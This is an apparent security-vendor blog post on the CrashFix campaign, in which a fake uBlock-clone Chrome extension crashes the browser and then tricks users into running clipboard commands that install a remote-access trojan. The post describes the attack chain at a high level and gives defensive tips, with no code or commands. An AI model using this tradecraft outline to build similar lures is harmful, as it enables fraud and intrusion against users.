CrashFix: a Chrome extension that crashes the browser to sell a fake “scan”

Huntress published analysis of a campaign it calls CrashFix, tied to the broader KongTuke traffic system (also referenced under names like TAG-124 / 404 TDS in industry reporting). The story is a deliberate escalation of ClickFix-style social engineering: a Chrome extension poses as a privacy / ad-block tool, degrades or crashes the browser, then offers a bogus remediation that steers the user toward pasting a command into Windows Run—classic living-off-the-land follow-through.

Coverage described victims arriving via malicious ads while searching for an ad blocker, then installing an extension from the Chrome Web Store—“NexShield – Advanced Web Guardian”—presented as a clone of uBlock Origin Lite. The listing had on the order of thousands of installs before removal.

How the loop worked (high level)

• Delayed activation — Malicious behavior could wait (reporting cited on the order of ~60 minutes after install), then repeat on a timer, which slows manual triage.
• Tracking — A unique ID was sent to attacker infrastructure so operators could correlate victims.
• DoS-style pressure — Before or alongside the lure, the extension could hammer the browser with resource-heavy work (described as extreme loop / connection patterns), making Chrome slow or frozen—so the user is already frustrated when a fake “browser stopped abnormally” or Edge-branded style warning appears.
• ClickFix — The “fix” is not a patch; it is instructions to open Run and execute clipboard content—often chaining PowerShell and finger.exe-style retrieval as documented in the same research line.
• Second stage — Obfuscated PowerShell led to ModeloRAT on some paths—Python-based, registry persistence, RC4 C2, with faster polling when operators flag a host as interesting. Domain-joined machines were called out as a preferred outcome for corporate follow-on; standalone hosts sometimes saw placeholder responses, suggesting testing or staged rollout.

Microsoft later framed CrashFix as a notable escalation in ClickFix tradecraft—user disruption plus trusted OS utilities instead of a memory corruption exploit.

Why impersonating uBlock matters

uBlock Origin family names carry trust. A near-identical manifest and version string from an unrelated publisher is a red flag even before any malicious code runs—verify the developer account on every install.

What to do

• Never run commands from a browser pop-up or extension “security scan.” Real fixes update the browser or OS, not Run dialogs.
• If Chrome hangs right after a new extension, remove it in Safe Mode or via chrome://extensions after a clean restart—do not follow fix prompts from the frozen window.
• Install ad blockers only from known publisher pages linked from official project sites—not sponsored search ads alone.
• On managed PCs, report unexpected Run / PowerShell prompts to IT.

Practical next step

Open chrome://extensions, sort mentally by install date, and remove anything search-sourced you cannot tie to a named vendor. eSafe can help you see permissions and risk signals in one place.

Go deeper

Crash, freeze, and fake support pages → — how tab-lock scams compare to extension-driven pressure tactics.

Report: The Hacker News.